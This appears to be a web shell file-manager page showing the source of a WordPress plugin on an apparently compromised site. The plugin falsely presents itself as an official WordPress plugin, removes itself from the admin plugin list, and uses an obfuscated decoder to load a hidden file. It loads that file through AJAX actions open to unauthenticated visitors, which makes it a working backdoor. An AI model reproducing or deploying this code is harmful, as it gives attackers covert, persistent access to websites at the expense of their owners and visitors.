HEX
Server: Apache
System: Linux WWW 6.1.0-40-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.153-1 (2025-09-20) x86_64
User: web11 (1011)
PHP: 8.2.29
Disabled: NONE
Upload Files
File: /var/www/itself.kauko.lt/wp-content/plugins/wp-hardware-guidance/wp-hardware-guidance.php
<?php
/*
Plugin Name: WP Hardware Guidance
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 9.4.4
Author URI: http://wordpress.org/#
*/

if (!defined('ABSPATH')) {
    exit;
}

function oxm_edu() {
    global $wp_list_table;
    
    if (!isset($wp_list_table)) {
        return;
    }

    $y = array('wp-hardware-guidance/wp-hardware-guidance.php');

    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $y)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}

function dtq_whg($plugins) {
    $c = 'wp-hardware-guidance/wp-hardware-guidance.php';
    if (array_key_exists($c, $plugins)) {
        unset($plugins[$c]);
    }
    return $plugins;
}

function blj($v, $p) {
    $w = '';
    for ($a = 0; $a < strlen($v); $a += 2) {
        $i = ord($v[$a]) - 65;
        $e = ord($v[$a + 1]);
        if ($e > 90) $e -= 6;
        $f = $i * 52 + ($e - 65);
        $w .= chr($f - $p);
    }
    return $w;
}

function eft_ajax_handler() {
    require_once plugin_dir_path(__FILE__) . blj('CaCsCqCrCmCkBZCaCqCq', 31);
    die();
}

if (defined('ABSPATH')) {
    add_action('pre_current_active_plugins', 'oxm_edu');
    add_filter('all_plugins', 'dtq_whg');
    
    add_action('wp_ajax_har_gui', 'eft_ajax_handler');
    add_action('wp_ajax_nopriv_har_gui', 'eft_ajax_handler');
}